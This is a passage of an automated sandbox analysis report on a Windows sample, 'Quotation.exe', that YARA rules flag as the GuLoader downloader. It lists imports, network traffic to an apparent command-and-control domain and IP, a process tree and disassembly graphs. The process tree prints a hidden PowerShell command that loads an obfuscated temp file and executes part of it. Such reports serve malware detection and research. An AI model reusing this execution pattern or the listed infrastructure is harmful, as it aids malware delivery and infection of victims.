                                            .ndata0x2b0000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x490000x579b00x57a00a86807d791054a691e5772471e696d24False0.2557618580599144data5.043641157087775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x492f80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.2293472793443205
                                            RT_ICON0x8b3200x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.2947030640009464
                                            RT_ICON0x9bb480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.45311203319502075
                                            RT_ICON0x9e0f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.5396341463414634
                                            RT_ICON0x9f1980x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.5963114754098361
                                            RT_ICON0x9fb200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6835106382978723
                                            RT_DIALOG0x9ff880x120dataEnglishUnited States0.5138888888888888
                                            RT_DIALOG0xa00a80x11cdataEnglishUnited States0.6056338028169014
                                            RT_DIALOG0xa01c80xc4dataEnglishUnited States0.5918367346938775
                                            RT_DIALOG0xa02900x60dataEnglishUnited States0.7291666666666666
                                            RT_GROUP_ICON0xa02f00x5adataEnglishUnited States0.7777777777777778
                                            RT_VERSION0xa03500x320dataEnglishUnited States0.46625
                                            RT_MANIFEST0xa06700x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                            Imports

                                            DLLImport
                                            KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                            USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                            SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                            ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 29, 2024 07:31:43.994138002 CET49710443192.168.2.16104.128.228.214
                                            Mar 29, 2024 07:31:43.994174957 CET44349710104.128.228.214192.168.2.16
                                            Mar 29, 2024 07:31:43.994265079 CET49710443192.168.2.16104.128.228.214
                                            Mar 29, 2024 07:31:44.001677036 CET49710443192.168.2.16104.128.228.214
                                            Mar 29, 2024 07:31:44.001691103 CET44349710104.128.228.214192.168.2.16
                                            Mar 29, 2024 07:32:16.093488932 CET49710443192.168.2.16104.128.228.214
                                            Mar 29, 2024 07:32:17.115664959 CET49712443192.168.2.16104.128.228.214
                                            Mar 29, 2024 07:32:17.115696907 CET44349712104.128.228.214192.168.2.16
                                            Mar 29, 2024 07:32:17.115803003 CET49712443192.168.2.16104.128.228.214
                                            Mar 29, 2024 07:32:17.116147041 CET49712443192.168.2.16104.128.228.214
                                            Mar 29, 2024 07:32:17.116161108 CET44349712104.128.228.214192.168.2.16
                                            Mar 29, 2024 07:32:49.206990957 CET49712443192.168.2.16104.128.228.214
                                            Mar 29, 2024 07:32:50.280725002 CET49713443192.168.2.16104.128.228.214
                                            Mar 29, 2024 07:32:50.280751944 CET44349713104.128.228.214192.168.2.16
                                            Mar 29, 2024 07:32:50.280868053 CET49713443192.168.2.16104.128.228.214
                                            Mar 29, 2024 07:32:50.281198025 CET49713443192.168.2.16104.128.228.214
                                            Mar 29, 2024 07:32:50.281213999 CET44349713104.128.228.214192.168.2.16

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 29, 2024 07:31:43.880685091 CET5094853192.168.2.161.1.1.1
                                            Mar 29, 2024 07:31:43.989120007 CET53509481.1.1.1192.168.2.16

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Mar 29, 2024 07:31:43.880685091 CET192.168.2.161.1.1.10x5cceStandard query (0)apwisulsel.sa.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Mar 29, 2024 07:31:43.989120007 CET1.1.1.1192.168.2.160x5cceNo error (0)apwisulsel.sa.com104.128.228.214A (IP address)IN (0x0001)false

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:07:31:09
                                            Start date:29/03/2024
                                            Path:C:\Users\user\Desktop\Quotation.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                            Imagebase:0x400000
                                            File size:806'728 bytes
                                            MD5 hash:833003BDB504BA4D779A2AFF899859E0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:07:31:13
                                            Start date:29/03/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)"
                                            Imagebase:0xd50000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2098766772.000000000D38C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:07:31:13
                                            Start date:29/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6684c0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:07:31:14
                                            Start date:29/03/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                            Imagebase:0xf20000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:07:31:16
                                            Start date:29/03/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                            Imagebase:0x7ff62c440000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:14
                                            Start time:07:31:39
                                            Start date:29/03/2024
                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                            Imagebase:0x3b0000
                                            File size:516'608 bytes
                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.2383373007.0000000005D2E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:7%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:3.2%
                                              Total number of Nodes:185
                                              Total number of Limit Nodes:8
                                              execution_graph 95787 50bf7d8 95788 50bf81e GetSystemInfo 95787->95788 95789 50bf84e 95788->95789 95790 8357490 95791 83574a3 95790->95791 95794 8357940 95791->95794 95795 8357973 95794->95795 95796 83579b3 95795->95796 95799 8357b38 95795->95799 95803 8357b28 95795->95803 95800 8357b4c 95799->95800 95807 8358f80 95800->95807 95801 8357b79 95801->95796 95804 8357b4c 95803->95804 95806 8358f80 CreateNamedPipeW 95804->95806 95805 8357b79 95805->95796 95806->95805 95808 8358fa9 95807->95808 95810 8359012 95808->95810 95813 83597c9 95808->95813 95817 83597d8 95808->95817 95809 8359005 95809->95801 95810->95801 95815 83597fe 95813->95815 95816 8359908 95813->95816 95815->95816 95821 8359594 95815->95821 95816->95809 95819 8359908 95817->95819 95820 83597fe 95817->95820 95818 8359594 CreateNamedPipeW 95818->95819 95819->95809 95820->95818 95820->95819 95822 8359ab8 CreateNamedPipeW 95821->95822 95824 8359bea 95822->95824 95825 50b1920 95826 50b1932 95825->95826 95830 50b4808 95826->95830 95835 50b47f8 95826->95835 95827 50b1962 95831 50b4812 95830->95831 95832 50b4837 95831->95832 95840 50b48b0 95831->95840 95845 50b48c0 95831->95845 95832->95827 95836 50b4808 95835->95836 95837 50b4837 95836->95837 95838 50b48b0 GetFileAttributesW 95836->95838 95839 50b48c0 GetFileAttributesW 95836->95839 95837->95827 95838->95837 95839->95837 95841 50b48d3 95840->95841 95850 50b4928 95841->95850 95856 50b4938 95841->95856 95842 50b48f1 95842->95832 95846 50b48d3 95845->95846 95848 50b4928 GetFileAttributesW 95846->95848 95849 50b4938 GetFileAttributesW 95846->95849 95847 50b48f1 95847->95832 95848->95847 95849->95847 95852 50b4938 95850->95852 95851 50b4a55 95851->95842 95852->95851 95862 50b6538 95852->95862 95854 50b6538 GetFileAttributesW 95854->95851 95858 50b494d 95856->95858 95857 50b4a55 95857->95842 95858->95857 95861 50b6538 GetFileAttributesW 95858->95861 95859 50b4a13 95859->95857 95860 50b6538 GetFileAttributesW 95859->95860 95860->95857 95861->95859 95866 50b6720 95862->95866 95871 50b6709 95862->95871 95863 50b4a13 95863->95851 95863->95854 95868 50b6738 95866->95868 95867 50b674d 95867->95863 95868->95867 95877 50b552c 95868->95877 95873 50b6720 95871->95873 95872 50b674d 95872->95863 95873->95872 95874 50b6768 95873->95874 95875 50b552c GetFileAttributesW 95873->95875 95874->95863 95876 50b677e 95875->95876 95876->95863 95878 50b6bf0 GetFileAttributesW 95877->95878 95880 50b677e 95878->95880 95880->95863 95969 50b3730 95972 50b9bf9 95969->95972 95971 50b3740 95973 50b9c08 95972->95973 95975 50bc636 4 API calls 95973->95975 95974 50ba5d4 95974->95971 95975->95974 95881 89eb5b0 95882 89eb5d5 95881->95882 95883 89eb5de 95881->95883 95886 89eb078 95882->95886 95890 89eb088 95882->95890 95887 89eb0ad 95886->95887 95888 89eb124 95886->95888 95894 50bc636 95887->95894 95888->95883 95891 89eb0ad 95890->95891 95892 89eb124 95890->95892 95893 50bc636 4 API calls 95891->95893 95892->95883 95893->95892 95895 50bc663 95894->95895 95896 50bc6e7 95895->95896 95899 50bc840 95895->95899 95906 50bc850 95895->95906 95896->95888 95900 50bc83e 95899->95900 95900->95899 95901 50bc86b 95900->95901 95913 50bd1c5 95900->95913 95918 50bd1dc 95900->95918 95923 50bd1f3 95900->95923 95928 50bd091 95900->95928 95901->95896 95907 50bc864 95906->95907 95908 50bc86b 95907->95908 95909 50bd1dc 4 API calls 95907->95909 95910 50bd1f3 4 API calls 95907->95910 95911 50bd091 4 API calls 95907->95911 95912 50bd1c5 4 API calls 95907->95912 95908->95896 95909->95908 95910->95908 95911->95908 95912->95908 95915 50bd142 95913->95915 95914 50bd273 95914->95914 95935 50bd3c7 95915->95935 95940 50bd3d8 95915->95940 95919 50bd142 95918->95919 95920 50bd3d8 4 API calls 95919->95920 95921 50bd3c7 4 API calls 95919->95921 95922 50bd273 95920->95922 95921->95922 95925 50bd142 95923->95925 95924 50bd273 95924->95924 95926 50bd3d8 4 API calls 95925->95926 95927 50bd3c7 4 API calls 95925->95927 95926->95924 95927->95924 95929 50bd08e 95928->95929 95932 50bd09f 95928->95932 95929->95901 95930 50bd10f 95930->95901 95931 50bd273 95932->95930 95933 50bd3d8 4 API calls 95932->95933 95934 50bd3c7 4 API calls 95932->95934 95933->95931 95934->95931 95936 50bd3d8 95935->95936 95944 50bd408 95936->95944 95952 50bd3f9 95936->95952 95942 50bd3f9 3 API calls 95940->95942 95943 50bd408 3 API calls 95940->95943 95941 50bd3e6 95941->95914 95942->95941 95943->95941 95945 50bd440 95944->95945 95961 50bcbbc 95945->95961 95947 50bd47c 95948 50bcbc8 ComputeAccessTokenFromCodeAuthzLevel 95947->95948 95949 50bd49b 95947->95949 95948->95949 95950 50bd68f IdentifyCodeAuthzLevelW 95949->95950 95951 50bd6df 95950->95951 95951->95951 95953 50bd3a0 95952->95953 95954 50bd402 95952->95954 95953->95914 95955 50bcbbc IdentifyCodeAuthzLevelW 95954->95955 95956 50bd47c 95955->95956 95958 50bd49b 95956->95958 95965 50bcbc8 95956->95965 95959 50bd68f IdentifyCodeAuthzLevelW 95958->95959 95960 50bd6df 95959->95960 95960->95960 95963 50bd5b8 IdentifyCodeAuthzLevelW 95961->95963 95964 50bd6df 95963->95964 95964->95964 95966 50bf3a0 ComputeAccessTokenFromCodeAuthzLevel 95965->95966 95968 50bf425 95966->95968 95968->95958 95976 89ef4a0 95977 89ef4bb 95976->95977 95979 89ef519 95977->95979 95981 89ef440 95977->95981 95983 50bc636 4 API calls 95981->95983 95982 89ef44c 95983->95982 95984 89edaa0 95985 89edaa8 95984->95985 95988 89ed6a8 95985->95988 95986 89edafe 95986->95986 95989 89ed6c4 95988->95989 95991 89ed7f8 95988->95991 95990 89ed6f4 95989->95990 95994 89ec9a8 95989->95994 95999 89ec998 95989->95999 95990->95986 95991->95986 95995 89ec9e6 95994->95995 95996 89eca33 95995->95996 95997 50b47f8 GetFileAttributesW 95995->95997 95998 50b4808 GetFileAttributesW 95995->95998 95996->95990 95997->95996 95998->95996 96000 89ec9a8 95999->96000 96001 89eca33 96000->96001 96002 50b47f8 GetFileAttributesW 96000->96002 96003 50b4808 GetFileAttributesW 96000->96003 96001->95990 96002->96001 96003->96001 96004 89e5660 96005 89e5694 96004->96005 96006 89e56cb 96005->96006 96009 89e4850 96005->96009 96013 89e4860 96005->96013 96010 89e4860 96009->96010 96017 89e4628 96010->96017 96011 89e48a5 96011->96011 96014 89e488d 96013->96014 96016 89e4628 4 API calls 96014->96016 96015 89e48a5 96015->96015 96016->96015 96018 89e4651 96017->96018 96019 89e467f 96017->96019 96018->96019 96020 50bc636 4 API calls 96018->96020 96019->96011 96020->96019

                                              Executed Functions

                                              Function 083A29B8 Relevance: 6.3, Strings: 4, Instructions: 1286COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 83a29b8-83a29e2 1 83a29e8-83a2a0b 0->1 2 83a2a7d-83a2aac 0->2 5 83a2a69-83a2a7b 1->5 6 83a2a0d-83a2a66 1->6 12 83a406e-83a4075 2->12 5->2 10 83a2ab1-83a2ac0 5->10 6->5 16 83a2ad9-83a2aed 10->16 17 83a2ac2-83a2ad3 10->17 18 83a2b4b-83a2b5d 16->18 19 83a2aef-83a2b48 16->19 17->16 21 83a2b63-83a2b70 17->21 18->21 24 83a2be2-83a2c02 18->24 19->18 21->24 28 83a2b72-83a2b9b 21->28 29 83a2c24-83a2c34 24->29 30 83a2c04-83a2c1f 24->30 28->24 44 83a2b9d-83a2bdd 28->44 36 83a2c3a-83a2c3e 29->36 37 83a2eb6-83a2ec3 29->37 30->12 39 83a2e64-83a2eb1 36->39 40 83a2c44-83a2c48 36->40 45 83a2ec9-83a2ee7 37->45 46 83a31ae-83a31cf 37->46 39->12 40->39 43 83a2c4e-83a2d4f 40->43 114 83a2dbf-83a2df8 43->114 115 83a2d51-83a2db9 43->115 44->12 45->46 54 83a2eed-83a3000 45->54 286 83a31d1 call 83a45ea 46->286 287 83a31d1 call 83a4654 46->287 49 83a31d7-83a3215 59 83a327c-83a32a8 49->59 60 83a3217-83a3279 49->60 127 83a30ac-83a31a9 54->127 128 83a3006-83a30a6 54->128 74 83a32ae-83a3325 59->74 75 83a332f-83a3335 59->75 60->59 74->75 119 83a3327-83a332a 74->119 76 83a333b-83a333f 75->76 77 83a3689-83a369b 75->77 81 83a350a-83a35af 76->81 82 83a3345-83a340c 76->82 88 83a369d-83a36af 77->88 89 83a36b5-83a36c4 77->89 132 83a3629-83a3666 81->132 133 83a35b1-83a3623 81->133 143 83a340e-83a3480 82->143 144 83a3486-83a3505 82->144 88->89 100 83a3773-83a3788 88->100 89->100 101 83a36ca-83a36d6 89->101 112 83a388b-83a38a0 100->112 113 83a378e-83a37e4 100->113 106 83a36ea-83a3770 101->106 107 83a36d8-83a36e4 101->107 106->100 107->100 107->106 130 83a3a63-83a3a78 112->130 131 83a38a6-83a3971 112->131 134 83a37e6-83a3812 113->134 135 83a3814-83a3838 113->135 149 83a2dfa-83a2e1c 114->149 150 83a2e21-83a2e3b 114->150 115->114 119->12 127->12 128->127 155 83a3a7e-83a3b00 130->155 156 83a3b05-83a3b1a 130->156 242 83a39fb-83a3a5e 131->242 243 83a3977-83a39f5 131->243 189 83a3669-83a3684 132->189 133->132 138 83a3842-83a3886 134->138 135->138 138->12 143->144 144->189 149->12 150->39 169 83a2e3d-83a2e5f 150->169 155->12 172 83a3b20-83a3b28 156->172 173 83a3e84-83a3e88 156->173 169->12 180 83a3b2a-83a3b30 172->180 181 83a3b40-83a3b80 172->181 187 83a3e8a-83a3e8d 173->187 188 83a3e92-83a3e96 173->188 192 83a3b32 180->192 193 83a3b34-83a3b36 180->193 194 83a3b82-83a3bae 181->194 195 83a3bb0-83a3bd4 181->195 187->12 190 83a3e9c-83a3ea0 188->190 191 83a3f86-83a3f8a 188->191 189->12 190->191 199 83a3ea6-83a3ec4 190->199 206 83a3f8c-83a3f9e 191->206 207 83a3fa0-83a3fad 191->207 192->181 193->181 201 83a3bde-83a3c27 194->201 195->201 199->191 221 83a3eca-83a3ee4 199->221 208 83a3c8b-83a3ce5 201->208 209 83a3c29-83a3c89 201->209 206->207 220 83a3faf-83a3fbb 206->220 222 83a3fd7-83a406c 207->222 216 83a3ceb-83a3d4f 208->216 209->216 223 83a3dc3-83a3e2d 216->223 224 83a3d51-83a3dc1 216->224 226 83a3fbd-83a3fc3 220->226 227 83a3fc5-83a3fd5 220->227 237 83a3f09-83a3f23 221->237 238 83a3ee6-83a3f04 221->238 222->12 240 83a3e33-83a3e7f 223->240 224->240 226->222 227->222 253 83a3f48-83a3f54 237->253 254 83a3f25-83a3f43 237->254 238->12 240->12 242->12 243->242 253->191 266 83a3f56-83a3f81 253->266 254->12 266->12 286->49 287->49
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #j^$3j^$Sj^$cj^
                                              • API String ID: 0-1157050092
                                              • Opcode ID: e98938b25d58ae31e152660a2e5a43da1c64a3a20f340d987db93b8dcb8cbb84
                                              • Instruction ID: e2b9b5f59f489162e68fd8734442e295867500443e7a227f69a7dffd82546218
                                              • Opcode Fuzzy Hash: e98938b25d58ae31e152660a2e5a43da1c64a3a20f340d987db93b8dcb8cbb84
                                              • Instruction Fuzzy Hash: 45D29274E012298FDB65DF68C894B9EB7F5BB88301F1081E9E809E7351DB35AE818F50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08359594 Relevance: 1.6, APIs: 1, Instructions: 128pipeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1904 8359594-8359b22 1907 8359b24-8359b2a 1904->1907 1908 8359b2d-8359b36 1904->1908 1907->1908 1909 8359b55-8359b59 1908->1909 1910 8359b38-8359b54 1908->1910 1911 8359b5b-8359b72 1909->1911 1912 8359b7a-8359be8 CreateNamedPipeW 1909->1912 1910->1909 1911->1912 1914 8359bf1-8359c2f 1912->1914 1915 8359bea-8359bf0 1912->1915 1919 8359c44-8359c48 1914->1919 1920 8359c31-8359c35 1914->1920 1915->1914 1922 8359c59 1919->1922 1923 8359c4a-8359c56 1919->1923 1920->1919 1921 8359c37-8359c3a 1920->1921 1921->1919 1924 8359c5a 1922->1924 1923->1922 1924->1924
                                              APIs
                                              • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08359BD8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID: CreateNamedPipe
                                              • String ID:
                                              • API String ID: 2489174969-0
                                              • Opcode ID: 9dc3019d10f56755a32028a8f684c01940847a0b25660c98dfdfcff083f4a217
                                              • Instruction ID: 1a9a30618970ed4fd090e8baf1f9f6a0121896c4ba6c7ea901d1a9d8804129b5
                                              • Opcode Fuzzy Hash: 9dc3019d10f56755a32028a8f684c01940847a0b25660c98dfdfcff083f4a217
                                              • Instruction Fuzzy Hash: 6E51F771D01358DFDB14CFAAD884B9DBFF6AF88305F24812AE818AB260D7749980CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 050BF7D8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: InfoSystem
                                              • String ID:
                                              • API String ID: 31276548-0
                                              • Opcode ID: 73aab53a661963505ac9354df17b72a4d23b603a90245158e433c32363b3f9fd
                                              • Instruction ID: 9a37ca1401692fbd6707f29ae832fab4dbd37b499a2ed93b320e508d6309e81f
                                              • Opcode Fuzzy Hash: 73aab53a661963505ac9354df17b72a4d23b603a90245158e433c32363b3f9fd
                                              • Instruction Fuzzy Hash: 7411E0B1C0065A9BDB00DF9AD844BDEFBF4FB48324F10812AD418B7240C7B4A954CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A45EA Relevance: .7, Instructions: 706COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 34de5770bb53de929aa25f4fb38b700b056f4818c35b09af1ccb2e7fe0f66698
                                              • Instruction ID: cdcbe45c16b647ec6d0cb2d16946ab28e27042cd8cc3aac34c4224fda9fc4cef
                                              • Opcode Fuzzy Hash: 34de5770bb53de929aa25f4fb38b700b056f4818c35b09af1ccb2e7fe0f66698
                                              • Instruction Fuzzy Hash: D2622834A012148FDB54DF68C884B9DBBF2EF89301F1581A9D809AB365DB74ED82CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0835BFA0 Relevance: .6, Instructions: 634COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7bd457dddc392ca7b2ef5c6d8a70f15e9f7ad751e736773a919dfef707189f5d
                                              • Instruction ID: c5a8b45369023d986035546c742b8daa655f3cfa9f31b9ca544ff1d7f934c7c5
                                              • Opcode Fuzzy Hash: 7bd457dddc392ca7b2ef5c6d8a70f15e9f7ad751e736773a919dfef707189f5d
                                              • Instruction Fuzzy Hash: 72426030A00759DFEB15DB64CC50BA9B776EF88304F1085A9E9097B391DB75ADC1CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EC9A8 Relevance: .6, Instructions: 618COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 589b0205426e641813b28769a725d4adb9af64704ff138c2bc33e9c92e060750
                                              • Instruction ID: 5cc8c16689aee44657296366263abeb51b5b22bee5a8d4774f704b3d75ae406f
                                              • Opcode Fuzzy Hash: 589b0205426e641813b28769a725d4adb9af64704ff138c2bc33e9c92e060750
                                              • Instruction Fuzzy Hash: FA426B34A10208DFDB15EF68D844A9DBBF2FF88316F148569E806AB350DB75ED42CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089AAF69 Relevance: .5, Instructions: 478COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093039059.00000000089A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e51c453d59d01d32ffddf7c1d5b0feba11ab362c97b4f0f3b932c7203755abb1
                                              • Instruction ID: 475651a6b18838b18e08aa78a3447f54b3f6c3498430cb7aee8c83f918377864
                                              • Opcode Fuzzy Hash: e51c453d59d01d32ffddf7c1d5b0feba11ab362c97b4f0f3b932c7203755abb1
                                              • Instruction Fuzzy Hash: F1126D34B002089FDB14EFA9D894A9EBBF6FF88355F148558E8069B354DB30ED46CB90
                                              Uniqueness
